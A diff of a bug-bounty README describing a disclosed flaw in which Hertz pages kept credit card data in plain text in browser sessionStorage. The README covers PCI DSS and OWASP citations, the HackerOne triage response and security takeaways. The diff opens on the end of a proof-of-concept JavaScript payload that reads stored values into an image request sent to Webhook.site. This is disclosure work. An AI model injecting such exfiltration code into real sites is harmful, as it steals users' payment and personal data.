pkieszek/credit-card-leak-web-storage/README.md

   "&phone=" + encodeURIComponent(sessionStorage.getItem("phone")) +
   "&url=" + encodeURIComponent(window.location.href);
 document.body.appendChild(stealthImage);

 📤 Data was successfully exfiltrated using Webhook.site, confirming real-world impact.

+⸻

 📜 Standards Violated
-	•	🔴 PCI DSS Requirement 3.2 – Storing CVV/PAN in plaintext after auth is strictly forbidden.
+	•	🔴 PCI DSS 3.2 – Storing full credit card details and CVV post-authentication is strictly prohibited
-	•	🟠 OWASP Secure Storage – Advises against storing sensitive data in browser storage.
+	•	🟠 OWASP Secure Storage – Recommends avoiding storage of sensitive data in browser-accessible memory
-	•	🔵 GDPR / CCPA – Personal and financial data must be securely stored and processed.
+	•	🔵 GDPR / CCPA – Mandate the secure storage and processing of personal and financial data

+⸻

 🔁 Vendor Response

-“Storing sensitive data in browser storage is not best practice, but not an exploit unless XSS or physical access is involved.”
+The issue was responsibly disclosed via the Hertz Vulnerability Disclosure Program (VDP) on HackerOne.

+Initial triage feedback categorized the issue as Informative, stating:

+“The present issue appears to be a self-XSS, which is not directly exploitable or would require convincing the user to copy/paste the JavaScript payload into the vulnerable field.”
-– HackerOne Triage
+— HackerOne Analyst

-However, based on the working PoC, successful data exfiltration, and evidence of partial post-report mitigation, I’ve requested a formal re-evaluation.
+While this rationale reflects a focus on exploitability in the current session, the presence of this sensitive data in browser-accessible memory constitutes a severe architectural vulnerability, especially when combined with potential future client-side injection points.

+A request for re-evaluation has been submitted, highlighting a successful PoC and partial post-report mitigation observed.

 ⸻

 🔐 Security Takeaways

-✔️ Never store sensitive data on the client side
+✔️ Never store sensitive information like credit card data or plaintext passwords on the client side ✔️ Treat all client-side storage as exposed
-✔️ Assume anything in browser memory can be accessed by an attacker ✔️ Don’t rely on “no XSS = no risk” logic — real-world attacks happen without injections ✔️ Build with secure-by-design principles from day one 👤 About the Researcher
+✔️ Don’t rely on “no XSS now = no risk” — threat landscapes evolve ✔️ Implement secure-by-design architecture from the beginning

+⸻

+👤 About the Researcher

 cybernomad42
-	•	Freelance pentester & bug bounty researcher
+	•	Freelance pentester & bug bounty hunter
-	•	Security consultant specializing in client-side flaws, web app security, and compliance risks
+	•	Security consultant focused on client-side flaws, web app security, and compliance
 	•	LinkedIn: linkedin.com/in/patrykkieszek
 	•	HackerOne: hackerone.com/cybernomad42

+⸻

 📂 Repository Tags

-bug-bounty pentesting sessionStorage plaintext-data credit-card-leak client-side-vulnerability pci-dss owasp javascript-security cybersecurity
+hertz bug-bounty pentesting sessionStorage plaintext-data credit-card-leak client-side-vulnerability pci-dss owasp javascript-security cybersecurity